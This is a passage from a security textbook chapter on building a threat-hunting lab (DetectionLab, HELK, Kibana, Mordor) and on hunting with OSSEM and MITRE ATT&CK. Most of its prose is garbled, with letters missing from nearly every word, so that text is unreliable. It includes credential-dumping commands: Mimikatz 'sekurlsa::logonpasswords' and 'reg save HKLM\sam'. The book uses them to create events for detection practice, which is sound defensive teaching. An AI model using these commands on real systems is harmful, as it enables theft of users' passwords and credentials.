                 Nx, di h mai.f fil o chag h siz of h Liux sysm (o accommoda
              la sps). Sach h mai.f fil fo h followig scio ad su h las li is
              chagd fom D1 o D2, as show:
              # Linux VM
              resource "azurerm_virtual_machine" "logger" {
                name = "logger"
                location = var.region
                resource_group_name = azurerm_resource_group.detectionlab.name
                network_interface_ids = [azurerm_network_interface.logger-nic.id]
                vm_size               = "Standard_D2_v2"

                 Now, s up you Azu accou if you hav o alady. If you alady hav a f
              accou h, o a askd duig sig up, you will d o slc Pay As You Go, as
              his opio is quid o lif h CPU quoa ad allows you o u h quid siz
              ad umb of machis fo his lab. A h im of his wiig, you will sill g h
              $200 cdi fo us i h fis moh (fo xampl, my sig showd abou $12.16
              a day wh dvlopig his lab). So as log as you shu dow h labs wh you’
              o usig hm, you should g ply of us fo ha $200 cdi. Rmmb, as
sad ali, you hav o b awa of h cos byod ha $200 cdi ad moio
i accodigly.

             NOTE If you forget to select Pay As You Go or get the following error later,
             you will need to go into billing and upgrade to Pay As You Go:
             ❘ Error: compute.VirtualMachinesClient#CreateOrUpdate: Failure sending
             request: StatusCode=0 – Original Error: autorest/azure: Service returned
             an error. Status=<nil> Code=“OperationNotAllowed” Message=“Operation

                                                                                                                    PART II
             could not be completed as it results in exceeding approved Total Regional
             Cores quota. Additional details … Please read more about quota limits at
             https://docs.microsoft.com/en-us/azure/azure-supportability/regional-
             quota-requests.”

  Nx, o auhica wih you w Azu accou, u h followig commad,
which will lauch a wbsi fo you o auhica o Azu:
% az login

   Nx, ca a SSH ky ha ca b usd by Tafom o maag you Logg (Liux)
sysm, as show x. B su o giv h w ky a passwod.
% ssh-keygen -t rsa -f ~/.ssh/id_logger

   Th, so h ky i ssh-ag (o ha Tafom ds o accss h ky wihou
a passwod, ad ssh-ag abls ha):
% ssh-agent
% ssh-add ~/.ssh/id_logger

  Fially, you ca lauch h labs fom h commad li usig h followig cod.

             NOTE This command will take a while to complete (couple hours), so take a
             break after you launch it.

% terraform apply –auto-approve
azurerm_resource_group.detectionlab: Creating...
azurerm_resource_group.detectionlab: Creation complete after 1s [id=/
subscriptions/6c33c197-88bf-49b5-85e8-1b2a3ccc2803/resourceGroups/
DetectionLab-terraform]
azurerm_public_ip.wef-publicip: Creating...
azurerm_public_ip.dc-publicip: Creating...
azurerm_public_ip.logger-publicip: Creating...
azurerm_virtual_network.detectionlab-network: Creating...
azurerm_public_ip.win10-publicip: Creating...
random_id.randomId: Creating...

Terraced
Gray Hat Hacking: The Ethical Hacker’s Handbook
                  Now, you ca viw h oupu fom h scips o s you IP addsss:
              % terraform output
              ata_url = https://52.250.17.114
              dc_public_ip = "52.250.56.150"
              fleet_url = https://52.250.56.143:8412
              guacamole_url = http://52.250.56.143:8080/guacamole
              logger_public_ip = "52.250.56.143"
              region = "westus2"
              splunk_url = https://52.250.56.143:8000
              velociraptor_url = https://52.250.56.143:9999
              wef_public_ip = "52.250.17.114"
              win10_public_ip = "52.250.52.139"

               You a almos do! You d o compl h povisioig of h WEF, Wi10, ad
              DC. To do ha, fis chag o h Asibl dicoy:
              % cd ../Ansible

                 Now di h ivoy.yml fil wih you favoi dio o upda h x.x.x.x IP
              valus of ach hos, usig you public_ip valus fom h Tafom oupu commad.
              B su o o mov idaios, as hy a impoa.
                 Th, u h Asibl playbook, fis sig a viom vaiabl o wok aoud
              a bug o macOS wih Asibl:
              % export no_proxy='*'
              % ansible-playbook -v detectionlab.yml

              Lab 8-3: Looking Around the Lab

              No ma if you s up you lab o you hos as pa of Lab 8-1 o i h cloud wih
              Lab 8-2, you may ow sa o op up h ools availabl ad ak a look aoud. Th
              IPs ad URLs a lisd i Lab 8-2. Th cdials fo h lab ools ad h IPs fo
              h local hos-basd labs may b foud a hps://www.dciolab.wok/imags/
              lab.pg. (I is impoa o o ha fo local hos-basd labs, you will oly b abl o
              accss hos ools fom h hos islf, as hos-oly accss is povidd via h1.) You will
              fid oh ools, alady isalld, lisd a hps://www.dciolab.wok/usag/.
              Tak a mom o pok aoud.

                                 NOTE If one of your host-based labs hangs, which is common with VirtualBox,
                                 you can simply close it by selecting Power Down and then running vagrant
                                 reload [dc|wef|win10|logger] (selecting the hanging VM) from your
                                 command line. In my testing, I noticed that even if I brought down a host
                                 forcefully, initially the reload command would complain of a locked VM, but
                                 after a few moments, the Vagrant script would reconnect and restart it.
Extending Your Lab
Th DcioLab alady coms wih mos of h ools you will d, bu w will add a
fw, as dscibd i h followig scios.

HELK
Th Huig vsio of ELK, HELK, was dvlopd by Robo Rodiguz. Robo
ad his boh Jos hav poud hi livs io scuiy sach ad ally hav mad a

                                                                                                                   PART II
diffc i ou fild. This auho is hakful fo hi coibuios ad hop o sha
som of ha goodss wih you i his chap ad h x. Th mai si fo HELK is
hps://gihub.com/Cyb3Wad0g/HELK.

Lab 8-4: Install HELK

You ca isall HELK fom you Logg (Liux) mial. If you hav h cloud-basd
lab, you ca us h followig commad:
% ssh -i ~/.ssh/id_logger vagrant@[logger_public_ip address above]

  Ohwis, if you hav a local build of h lab, you ca accss h SSH shll via
Vaga (fom you admiisao PowShll):
PS C:\DetectionLab\Vagrant> vagrant ssh logger

  Th, ih way, you ca isall HELK as follows:
vagrant@logger:~$ git clone https://github.com/Cyb3rWard0g/HELK.git
Cloning into 'HELK'...
remote: Enumerating objects: 10060, done.
remote: Total 10060 (delta 0), reused 0 (delta 0), pack-reused 10060
Receiving objects: 100% (10060/10060), 852.58 MiB | 43.54 MiB/s, done.
Resolving deltas: 100% (6925/6925), done.
vagrant@logger:~$ cd HELK/docker/
vagrant@logger:~/HELK/docker$ ls
helk-base                                      helk-logstash
…truncated for brevity…
helk-kibana-notebook-analysis-alert-basic.yml helk_setup_firewall.sh
helk-kibana-notebook-analysis-basic.yml        helk_update.sh
helk-ksql

   Fo cloud-basd labs, h IP will b s fo you auomaically. Fo hos-basd labs, b
su o chck h IP fo h1 fis, mak o of i, ad us i i h scip wh you’
askd fo a IP:
vagrant@logger:~/HELK/docker$ ifconfig eth1
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
        inet 192.168.38.105 netmask 255.255.255.0 broadcast 192.168.38.255
Gray Hat Hacking: The Ethical Hacker’s Handbook
                  Now, isall HELK:
              vagrant@logger:~/HELK/docker$ sudo ./helk_install.sh

              ***********************************************
              **          HELK – THE HUNTING ELK           **
              **                                           **
              ** Author: Roberto Rodriguez (@Cyb3rWard0g) **
              ** HELK build version: v0.1.9-alpha10082020 **
              ** HELK ELK version: 7.6.2     **
              ** License: GPL-3.0                          **
              ***********************************************
              [HELK-INSTALLATION-INFO] HELK hosted on a Linux box
              [HELK-INSTALLATION-INFO] Available Memory: 6540 MBs
              [HELK-INSTALLATION-INFO] You're using ubuntu version bionic
              *****************************************************
              *      HELK – Docker Compose Build Choices          *
              *****************************************************
              1. KAFKA + KSQL + ELK + NGINX
              2. KAFKA + KSQL + ELK + NGINX + ELASTALERT
              3. KAFKA + KSQL + ELK + NGINX + SPARK + JUPYTER
              4. KAFKA + KSQL + ELK + NGINX + SPARK + JUPYTER + ELASTALERT

                If you followd h pvious cloud isucios, slc opio 2, as show x. La,
              you may xpim wih h oh opios; hy a ga bu o dd fo his chap.
              Enter build choice [ 1 – 4]: 2
              [HELK-INSTALLATION-INFO] Set HELK IP. Default value is your current IP:
              192.168.38.105
              [HELK-INSTALLATION-INFO] HELK IP set to 192.168.38.105
              [HELK-INSTALLATION-INFO] Please make sure to create a custom Kibana password
              and store it securely for future use.
              [HELK-INSTALLATION-INFO] Set HELK Kibana UI Password: hunting
              [HELK-INSTALLATION-INFO] Verify HELK Kibana UI Password: hunting
              [HELK-INSTALLATION-INFO] Installing htpasswd..
              [HELK-INSTALLATION-INFO] Installing docker via convenience script..
              [HELK-INSTALLATION-INFO] Assessing if Docker is running..
              [HELK-INSTALLATION-INFO] Docker is running
              …truncated for brevity…
              ****************************************************************************
              ** [HELK-INSTALLATION-INFO] HELK WAS INSTALLED SUCCESSFULLY
              ** [HELK-INSTALLATION-INFO] USE THE FOLLOWING SETTINGS TO INTERACT WITH THE
              HELK
              ****************************************************************************

              HELK KIBANA URL: https://192.168.38.105
              HELK KIBANA USER: helk
              HELK KIBANA PASSWORD: hunting
              HELK ZOOKEEPER: 192.168.38.105:2181
              HELK KSQL SERVER: 192.168.38.105:8088

              IT IS HUNTING SEASON!!!!!

              You can stop all the HELK docker containers by running the following command:
               [+] sudo docker-compose -f helk-kibana-analysis-alert-basic.yml stop
    Now, lauch a bows ad accss h HELK (Kibaa) cosol, ih wih h IP
show i h pvious cod (if you buil you lab locally) o wih h cloud public addss
(if you’ usig h cloud). Sic w a usig a hos-basd lab i his scio, w will us
h IP hps://192.168.38.105.

                                                                                                                     PART II
Lab 8-5: Install Winlogbeat

I od o g logs o Logsash, ad ulimaly o h Kibaa dashboad show i h
pvious illusaio, you d o isall bas (ha is, filba, packba, wilog-
ba, ad ohs). Fo ou puposs, w a isd i Widows fil logs, so w will
us wilogba. Usig ih you Guacamol mial (hp://192.268.38.105:8080/
guacamol) fo h hos-basd lab o RDP fo h cloud lab, coc o you WEF sv
ad h dowload ad isall wilogba fom hps://www.lasic.co/dowloads/
bas/wilogba.
   Uzip ha wilogba.x.zip fil o c:\pogam fils\ ad am h uzippd fold
o c:\pogamfils\wilogba.
   Th, fom ha WEF sv, op h followig fil fom a bows ad sav i ov
h dfaul wilogba.yml fil i h c:\pogamfils\wilogba\ fold:
https://raw.githubusercontent.com/GrayHatHacking/GHHv6/main/ch08/winlogbeat.yml

  Nx, isall ad sa h svic fom PowShll usig admiisao accss:
PS C:\Windows\System32> cd "C:\Program Files\Winlogbeat"
PS C:\Program Files\Winlogbeat> powershell.exe -ExecutionPolicy UnRestricted
-File
.\install-service-winlogbeat.ps1
Start-Service winlogbeat
Gray Hat Hacking: The Ethical Hacker’s Handbook
                  Now, chck h Svics pal ad su h svic is uig, as show x.

                 Back i h Kibaa dashboad, if you click h Discov ico locad alog h lf
              sid (h scod ico dow), you should s w daa fom wilogba, as show x.

              Lab 8-6: Kibana Basics

              Idx pas a usd by Kibaa o accss daa wihi Elasicsach. I spcifis h
              goupigs of daa (o sach) ad how h filds a dfid (hough popis). W will
              dmosa how o ca idx pas ad h how o us Kibaa fo basic quis.
Index Patterns
I is of usful o ca you ow idx pas i Elasicsach. Sa by slcig h
Kibaa logo i h upp-lf co o go o h hom pag. Th scoll dow som ad
slc Idx Pas:

                                                                                                                     PART II
  Nx, slc h Ca Idx Pa buo o h igh:

   Th, compl sp 1 of 2 by filig o h availabl log soucs. I ou xampl,
w will jus ca a mas idx of all logs bgiig wih “log”. Typ log* i h idx
pa fild h click Nx Sp:
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 Nx, compl sp 2 of 2 by idicaig wha fild o coduc im-basd fils o.
              Slc @imsamp o kp i simpl. Slc h dop-dow fo Advacd Opios ad
              giv you w idx a am. I his cas, w calld i logs* Gay Ha. Th click Ca
              Idx Pa.

                 Jus lik ha, w hav ou ow idx. This may o hav smd impssiv, paicu-
              laly giv ha Elasicsach alady cad a idx fo us calld logs-*. Howv, i h
              fuu you may wa o ca you ow idxs (fo xampl, ov a small s of log
              soucs o fo a paicula day o wk’s woh of logs) i od o spd up you sachs,
              as you alady hav a subs of daa idxd.

              Basic Queries
              To hlp you la o quy Kibaa (h us ifac of Elasicsach), l’s giv i som-
              hig isig o fid. Op you Wi10 hos, ih fom h Guacamol wb i-
              fac, dicly o h VM (fo hos-basd labs), o via RDP (if you’ usig a cloud lab).
                 Fom h Wi10 hos, op Explo ad aviga o h c:\uss\vaga\ools fold,
              as show x:

                Doubl-click h mimikaz.x fil. This pogam allows you o display h pass-
              wods of h uss o h sysm, i plaix. Typ h followig commads i h
              Mimikaz cosol:
              log
              privilege::debug
              sekurlsa::logonpasswords

                                                                                                                    PART II
   Now, back o you Kibaa wb pag, you should b abl o s h v by yp-
ig mimikatz.exe i h op sach pal of h Discov pag, wih Las 15 Mius
slcd as h imfam o h igh:

   Now w ca do b ha ha; w ca us h filds wihi h log o fid i ha way.
   I h op sach fild, yp process.name:"mimikatz.exe" and event_id:1 ad pss
enter. You should s h sam suls. O h lf sid of h sc, slc h dow
aow x o h logs* labl ad slc ou idx, logs* Gay Ha. You should sill s
h sam sul. Now h is much mo o la abou Kibaa ad Elasicsach, bu
hs a h basics you d o kow fo ow. W will pick up a fw mo icks i h
x chap.
Gray Hat Hacking: The Ethical Hacker’s Handbook

              Lab 8-7: Mordor

              Modo was cad by… you gussd i, Robo ad Jos Rodiguz. Agai, w ow
              hos guys a db of gaiud. Modo is a collcio of daa ss suoudig APT aciv-
              iy. Ys, you ca dowload h daa ss ad pacic fidig al APTs i you lab. W
              will isall i h ad h play wih i i h x chap.
                  Follow h isucios o GiHub fo dowloadig ad isallig Modo daa ss
              (hps://gihub.com/OTRF/modo), saig wih h kafkaca dpdcy:
              vagrant@logger:~/HELK/docker$ sudo apt install kafkacat
              Reading package lists... Done
              Building dependency tree
              Reading state information... Done
              The following package was automatically installed and is no longer required:
                linux-headers-4.15.0-140
              …truncated for brevity…
              Processing triggers for man-db (2.8.3-2ubuntu0.1) ...
              Processing triggers for libc-bin (2.27-3ubuntu1.4) ...

                  Mov back o hom dicoy o Logg:
              vagrant@logger:~/HELK/docker$ cd ~

                Now, dowload ad isall Modo daa ss fom wihi you lab viom
              (Logg hos):
              vagrant@logger:~$ git clone https://github.com/Cyb3rWard0g/mordor.git
              Cloning into 'mordor'...
              remote: Enumerating objects: 13577, done.
              remote: Counting objects: 100% (2678/2678), done.
              remote: Compressing objects: 100% (718/718), done.
              remote: Total 13577 (delta 2079), reused 2456 (delta 1884), pack-reused 10899
              Receiving objects: 100% (13577/13577), 333.00 MiB | 33.55 MiB/s, done.
              Resolving deltas: 100% (9428/9428), done.
              Checking out files: 100% (647/647), done.
              vagrant@logger:~$ cd mordor/datasets/compound/apt29/day1
              vagrant@logger:~/mordor/datasets/compound/apt29/day1$ ls
              README.md apt29_evals_day1_manual.zip pcaps zeek

                  Isall uzip ad h uzip h daa s:
              vagrant@logger:~/mordor/datasets/compound/apt29/day1$ sudo apt install unzip
              Reading package lists... Done
              Building dependency tree
              Reading state information... Done
              …truncated for brevity… ...
              Unpacking unzip (6.0-21ubuntu1.1) ...
              Setting up unzip (6.0-21ubuntu1.1) ...
              Processing triggers for mime-support (3.60ubuntu1) ...
              Processing triggers for man-db (2.8.3-2ubuntu0.1) ...
              vagrant@logger:~/mordor/datasets/compound/apt29/day1$ unzip apt29_evals_day1_
              manual.zip
              Archive: apt29_evals_day1_manual.zip
                inflating: apt29_evals_day1_manual_2020-05-01225525.json
  Now, lauch kafkaca o igs h Modo daa s:
vagrant@logger:~/mordor/datasets/compound/apt29/day1$ kafkacat -b
localhost:9092 -t
winlogbeat -P -l apt29_evals_day1_manual_2020-05-01225525.json

   Af h kafkaca ool compls (20 mius o so), op Kibaa ad adjus h
Discov pag, sig h imfam o Ja 1, 2020 uil ow. You should s vs
fom h middl of 2020. Agai, w will pick up h hu i h x chap.

                                                                                                                 PART II
Summary
I his chap, w discussd how o s up a ha huig lab. W usd Chis Log’s
DcioLab ad augmd i wih ools fom Robo ad Jos Rodiguz. W p-
sd wo mhods of isallaio: o o you local hadwa ad h oh i h
cloud. W also xdd h lab o us HELK ad Modo. Fially, w walkd hough
som basics wih Kibaa o quy Elasicsach. W will us his lab i h x chap
o la ha huig. S you h.

For Further Reading
Red Canary Atomic Red Team (testing scripts to emulate threats; will be used in next
chapter) gihub.com/dcaayco/aomic-d-am
MITRE ATT&CK Navigator mi-aack.gihub.io/aack-avigao/
Threat Hunting with MITRE ATT&CK www.hahuig.s/2020/05/24/ha-
dcio-wih-mi-ack-ad-aomic-dam/
SANS: Building and Growing Your Threat Hunting Program www.sas.og/mdia/
aalys-pogam/buildig-mauig-ha-huig-pogam-39025.pdf
Chris Long’s Blog hps://clo.g/blog/
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Roberto Rodriguez’s GitHub Projects gihub.com/Cyb3Wad0g
              Roberto Rodriguez’s Blog mdium.com/ha-hus-fog/aggd/ha-huig
              Purple Cloud (cloud templates for security testing) gihub.com/ikowjaso/
              PuplCloud
              Cyber Range (cloud templates for security testing) gihub.com/scdvops-cus/
              CybRag
              DetectionLabELK (fork of DetetectionLab with ELK stack) gihub.com/
              cybdfds/DcioLabELK/
              Blacksmith (cloud-based lab templates) gihub.com/OTRF/Blacksmih
              SimuLand (more cloud-based lab templates) gihub.com/OTRF/simulad

              References
                   1. C. Log, clog/DcioLab (2021), hps://gihub.com/clog/DcioLab
                      (accssd Ju 4, 2021).
                   2. R. Rodiguz, Cyb3Wad0g/HELK (2021), hps://gihub.com/Cyb3Wad0g/
                      HELK (accssd Ju 4, 2021).
                   3. OTRF/modo. Op Tha Rsach Fog (2021), hps://gihub.com/
                      OTRF/modo (accssd Ju 4, 2021).
                   4. OTRF/OSSEM. Op Tha Rsach Fog (2021), hps://gihub.com/
                      OTRF/OSSEM (accssd Ju 4, 2021).
                   5. OTRF/ThaHu-Playbook. Op Tha Rsach Fog (2021),
                      hps://gihub.com/OTRF/ThaHu-Playbook (accssd Ju 4, 2021).
                   6. “Op Tha Rsach Fog,” GiHub, hps://gihub.com/OTRF
                      (accssd Ju 4, 2021).
                   7. “ELK F ad Op Sach: Th Caos of Elasicsach, ELK & Kibaa |
                      Elasic.” hps://www.lasic.co/ (accssd Ju 4, 2021).
                   8. “Dowloads – Oacl VM ViualBox.” hps://www.viualbox.og/wiki/
                      Dowloads (accssd Ju 4, 2021).
                   9. “Gi Commad Li Tools – Dowloads.” hps://gi-scm.com/dowloads
                      (accssd Ju 4, 2021).
                 10. Vaga, HashiCop, hps://www.vagaup.com/ (accssd Ju 4, 2021).
                 11. “Toublshooig & Kow Issus :: DcioLab.” hps://www.dciolab
                     .wok/dploym/oublshooig/ (accssd Ju 4, 2021).
                 12. “Ca you Azu f accou oday | Micosof Azu.” hps://azu.micosof
                     .com/-us/f/ (accssd Ju 4, 2021).
13. “Hombw,” Hombw, hps://bw.sh/ (accssd Ju 19, 2021).
14. “Dowload Tafom,” Tafom by HashiCop, hps://www.afom.io/
    dowloads.hml (accssd Ju 4, 2021).
15. “Isallig Asibl – Asibl Documaio,” hps://docs.asibl.com/asibl/
    las/isallaio_guid/io_isallaio.hml (accssd Ju 4, 2021).
16. dbadish-micosof, “How o isall h Azu CLI,” hps://docs.micosof.com/
    -us/cli/azu/isall-azu-cli (accssd Ju 4, 2021).

                                                                                                              PART II
This page intentionally left blank
  Introduction
  to Threat Hunting
                                                                             CHAPTER

                                                                                              9
  In this chapter, we cover the following topics:
      • Threat hunting basics
      • Normalizing data sources with OSSEM
      • Data-driven hunts using OSSEM
      • Hypothesis-driven hunts using MITRE ATT&CK
      • The Mordor project
      • The Threat Hunter Playbook

Wa  a ug? Ta ug  bad o  aumpo a a advay 
alady   wok ad you d o ack m dow. T  a opc a qu
qu a b o kowldg abou () ow adva opa ad () ow ym opa
omally ad w ud aack. To,   a opc a cao b covd ully
  cap. Howv, w am o gv you a ovvw o  bac, om wc you
ca xpad ov m.

Threat Hunting Basics
Ta ug  a ymac poc o ug o a advay wo  alady  
wok. W a alkg abou a bac a a alady ad, ad  goal  o o
 amou o m  aack ca dwll   wok. Oc  aack  dcov-
d, a pop cd po ca b appld o mov m om  wok ad
o opao back o omal. To, a ug  o cd po,
aloug  may way y wok og ad may o b compod o popl w
 am kll . Howv, dally,   a paa a ug am a u
ull m o ay adva   wok. I a budg-coad ogazao, a
u may wc a a a advay  dcovd ad pom cd po
uco. Lkw, a a u  o a pao . Aga,  wo may av
mla backgoud ad kll , bu  md  d. A pao  
kg way o ad aco a wok o dcov vulabl ad g m xd,
bo a advay d m. T a u aum a bac a alady occud
ad  mo ocud o dg  al o a advay ad dcg m oc d
a wok a y a ocud (ally) o ow  advay go .
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Types of Threat Hunting
              T a val yp o a ug, clud  ollowg:

                    • Il-dv u
                    • Daa-dv u
                    • Hypo-dv u

              Intel-Driven Hunts
              Il-dv u a gudd by cyba llgc ad  dcao o compo-
              m dvd om op ad clod ouc llgc. Fo xampl, a l a may b
              a dcao o compom, ad ’ wo cckg o  xc o a l aco
               vom. Fu,  acc, cqu, ad pocdu (TTP) o pacula
              a aco a o  o ay a u, ad  a o oud  llgc
              po ad om omao ad by o. Howv, w wll o ocu o  yp
              o ug, a  cqu dployd a ud   o, ad cao.

              Data-Driven Hunts
              Daa-dv u a pomd by acg o aomal   moud o daa
              w a ogazao. T b way o pom  yp o u  by ug a
              aalyc plaom, uc a Spluk o Elacac, o cu oug  ayack o daa,
              lookg o  dl. Fu,  adoal Scuy Iomao Ev Maag-
              m (SIEM) dvc  a valuabl ag po o daa-dv u. Howv, a a
              u wll lkly ougow  capably o v  b SIEM avalabl, paculaly
              w y a o pom  ad ou jo o dpaa daa ouc, cludg
              uucud daa ouc, wc  dcul  o mpobl o mo SIEM. W wll
              xplo daa-dv u   cap.

              Hypothesis-Driven Hunts
              A you wll call om Cap , a  op o  pyamd o pa   TTP o a
              advay. T bavo o a advay   mo dcul g o dcov. T good
              w  a adva o pa wa wok, ad   a po a gv u a
              clu a o wa o look o w a gv advay goup. T MITRE ATT&CK am-
              wok   collco o may kow (publc) TTP ad a v b ud o d-
              ca ca advacd p a (APT) goup’ acv. Ug  amwok
              a a ouc, w ca u ou magao ad buld a ypo o a advay’ aco
              w a wok. Ay ypo may b  d;  by ug w av 
              pop daa ouc o   ag bavo ad  by buldg aalyc o ac o
              a bavo  a gv wok vom. Fally, w ca buld al o l u kow
              w a bavo app   uu. I  way, w ca modcally wok ou way
              oug  MITRE ATT&CK amwok, buldg a covag map a w go. O ky
              cocp a  po  o cogz a w wll o b ag   mddl o 
              amwok, a w a aumg compom o a w. T,  w dcov g o a
ypo bg u, w ca wok  bo dco aco  amwok: () o wok
owad ad d  ulma dp o  pao ad k o  vom,
ad () o wok backwad o d  ouc o  bac ad o clo a ol gog
owad. W wll xplo  yp o ug la   cap a wll.

Workflow of a Threat Hunt
T bac woklow o a a u  a ollow:

                                                                                                                      PART II
   1. Pom a daa ouc voy, gap am, ad mdao o.
   2. Dm  yp o u o pom ad  ac ca.
   3. Eu you av  daa qud o ay  ac ca.
   4. Pom  ac.

             TIP Emulate the threat as well as ensure the search and data are what’s
             expected, before relying on the search results more generally.

   5. Cck ul. I aack bavo  oud, cou vgao ad oy 
      cd po (IR) am.
   6. I aack bavo  o oud, u o  op. T  ad pa.

   Ta’ . Su, you wll d o la a lo dug  poc abou ow you op-
ag ym  you vom wok, ow log daa  gad, amd, ad
od, ad ow a advay mov oug a wok, paculaly w y look lk
a omal u, bu a  all pa o . I wll ak a wl, mayb v ya, bo you
bcom poc a a ug. So l’ bg ow!

             NOTE It is important to realize that becoming a threat hunter is a journey
             that will take years before you can consider yourself an expert. We will strive
             to show you the basics in this chapter and equip you with the tools to hone
             your craft, over time. However, there is no substitute for you putting in your
             10,000 hours, which is true for topics covered in the rest of this book as well.
             So, this chapter is not intended to be an exhaustive source or explanation of
             threat hunting. It would take an entire book to do that (see the “For Further
             Reading” section for a good one). For those with experience in threat hunting,
             we hope you find a few new tips in this chapter, but it is really aimed at those
             new to the topic.

Normalizing Data Sources with OSSEM
W wll a by dcug daa ouc,  d o omalzg log om vaou
daa ouc, ad  Op Souc Scuy Ev Madaa (OSSEM) pojc ad
ool a ad  a poc. A dcud pvouly,   p  ay a u
Gray Hat Hacking: The Ethical Hacker’s Handbook
               udadg you daa ouc ad  pomg a gap aaly ad mdao
              pojc  you a mg daa. Lkly, a you pog, you wll d ou you a mg
              ky daa, ad you ca adju u a you go.

              Data Sources
              T poblm w daa  a ac dvc, opag ym, ad applcao (ouc)
              poduc log  a d oma. To mak ma wo, om vdo, uc a
              Mcoo, av val om o loggg; o, dpdg o wa you a kg,
               daa may vy wll b  a oma a’ d om  o log om a v-
              do. Fo xampl, Mcoo o log  Ev Vw (EVT), xpo API-lvl acc
              o kl-lvl log va Ev Tacg o Wdow (ETW), ad may owad log va
              Wdow Ev Fowadg (WEF) v. Fu, Mcoo povd a ool, Symo,
              a povd ym-lvl log o poc, l, ad wok acv  a lgwg
              ma.1, 2 Eac o  loggg mod, o mo ju a w, povd a d o-
              ma. So, ow a w o omalz o log ouc, ad  udd o o ouc,
              o a acabl ad calabl oma?

              OSSEM to the Rescue
              T Op Souc Scuy Ev Madaa (OSSEM) Pojc com o  cu.3 T
              bo Robo ad Jo Rodguz cad  OSSEM Pojc o lp ac
              a daa ad aalyc,  a adad oma, o  ld could mov owad a, o
              log m alag cuy lva log oma. A mod val m  
              cap, w ow  Rodguz bo a db o gaud o all y av povdd o
              o o u   ld.
                 T OSSEM Pojc  pl o  pa:

                    • Common Data Model (CDM) Povd o a commo cma o daa,
                      ug cma  ad cma abl o allow o  abaco o log
                      (o xampl, w dcug wok log,  HTTP, Po, ad U-Ag
                       av b dd).
                    • Data Dictionaries (DD) Collco o CDM  ad abl a d a
                      pacula v log. May commo log oma av b dd, ad you a
                       o d you ow.
                    • Detection Data Model (DDM) A collco o daa objc ad laop
                      qud o d aack bavo, uc a mappg  MITRE ATT&CK
                      amwok o log. Muc wok a b do  o compl a ga dal o
                       amwok (o a you pacpao ad cobuo a wlcom4).
                 Tog,  compo o  OSSEM abl ou daa-dv ad ypo-
              dv a ug. A you wll   a mom, w ca ly o  ool o pd
              up ou aaly ad o g boggd dow  log oma, ld am, ad o o. Ug
              OSSEM  a al m-av.
Data-Driven Hunts Using OSSEM
F, w wll u OSSEM o pom a daa-dv u. W wll a by povdg a
 o  MITRE ATT&CK amwok, vualzg  daa ug OSSEM, ad
 dvg g  ad gg ou ad dy ug.

MITRE ATT&CK Framework Refresher: T1003.002
You wll call  MITRE ATT&CK amwok om Cap . I  cap, w

                                                                                                                     PART II
wll apply  o u o advaal bavo. To a w, w wll ak a look a ub-
cqu T003.00, OS Cdal Dumpg.5 T ub-cqu dcb ow a
advay may xac cdal omao om  Wdow Scuy Accou Ma-
ag (SAM),  om mmoy o om  Wdow gy, w   od. T
SAM  a bg ag o aack, o obvou ao:  coa  local cdal o
 o.
   A xplad   amwok, a umb o auomad ool may b ud o gab 
SAM, o a mpl commad om  admao’ commad-l wdow wll uc:
reg save HKLM\sam sam
reg save HKLM\system system

  L’ ak a look a wa OSSEM ll u abou  ub-cqu.

Lab 9-1: Visualizing Data Sources with OSSEM

Sa by vg p://ompojc.com/dm/m_aack/aack_cqu_o_
v.ml.
   T, ov ov  ock p (lauc) co o  upp-g co o  
ad clck Bd o lauc a Jupy obook, o , o  Bd .

   T Jupy obook allow o lv, acv pocg o Pyo, ad all 
aocad lba, om  covc ad ay o you bow. I wll ak a
mom o load up (’  a all, ak o  gou doao o o ld a
 op o   pag). W  load, you wll   ollowg c. Clck  
Gray Hat Hacking: The Ethical Hacker’s Handbook
              gay block o cod ad  clck  Ru buo a  op o p shift-enter o
              poc a block o cod.

                 Go aad ad xcu  x block o cod a wll. I wll ak a wl o u, a 
              MITRE ATT&CK cqu a pulld ad pad. Wl   ug, you wll oc
              a ak  back ([*]) o  l d o  block o cod. W  compl, 
              ak wll u o a umb pg  block o cod. T head() commad
              wll ow   v m   mappg, ag w 0, a ow x:

                 A a o wa, you ca cou by xcug  x block() o cod (ac
              xplad by a adg ad x po o  block), wc u OSSEM o ow  daa
              ouc ad compo o  T003.00 ub-cqu. Adju  cod o  o
              T003.00, a ow x. T   bauy o Jupy obook: y a dyamc
              ad you ca xpm w m o la.
H, w ca   commad, gy, ad l daa ouc a uul  dcg
commad xcuo, Wdow gy ky acc, ad l acc, pcvly.
   Now mody  x block o cod o oc aga p  T003.00
ub-cqu.

                                                                                                                  PART II
   Now w   v ID ud o d acvy aocad w  T003.00 ub-
cqu. T  powul, a you ow ca g o ug w  daa wou wo-
yg abou  o v ID. You av  pa o ac o  acvy: l,
Wdow gy, ad commad-l log.
   Excu  x commad ad coll o  g o  daa wdow o   dal
o  gapcal daa. You wll d o mody  cod   block, a ow x, o
T003.00:
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 O  g d o  l a log cal ad  aocad log povd (ouc).
              So, o xampl, w ca  a w lookg o  commad xcuo ou o 
              aack, w ca u o v ID o 488 ad 403 o commad l ad PowSll
              xcuo, pcvly. T v ID a d w  a u o poc pom
              commad xcuo, o w a covd w  aack yp a a commad l o
              xcu cp a lauc poc o xcu  commad—wc  good. W alo
              oc a Symo log clud a v ID o  o  acvy. I u ou a v
              ID   aocad w all poc cao ad  l pcc   ca, o w wll ck
              w  o wo v ID.
                 Scollg dow a b, w  mla daa o  cqu a dcly acc 
              SAM om  gy:

                 Ad v u dow, w  daa om  cqu a a aocad w
              dc l acc o  SAM objc:

                 Now, l’ la ao cqu o mula aack bavo  od o pacc
              dg    log. Cyb a mulao (CTE)  a oc mulpl ad ally accl-
              a you lag.

Lab 9-2: AtomicRedTeam Attacker Emulation

L’ u ou ao o  AomcRdTam cp o mula  MITRE ATT&CK
T003.00 (SAM) aack. Ug  am lab up om Cap 8, “cd” o 
c:\Tool\AomcRdTam\aomc\T003.00 old o  Wdow 0 o.

                                                                                                                   PART II
            NOTE If you don’t see a c:\Tools folder, then you likely had an issue during
            the install; in that case, go to your host system and, from your administrator
            PowerShell window, run vagrant provision win10. The same is true with the
            DC and WEF servers. Further, if a lab in this chapter hangs, you may need to
            restart through vagrant halt system name, then vagrant up system name.
            If this happens a lot, consider adding more RAM or running from the cloud
            (with more RAM). The labs worked as demonstrated on Windows 10 hosts,
            but your mileage may vary on other operating systems.

  Alo, om a wb bow, op  ollowg URL:
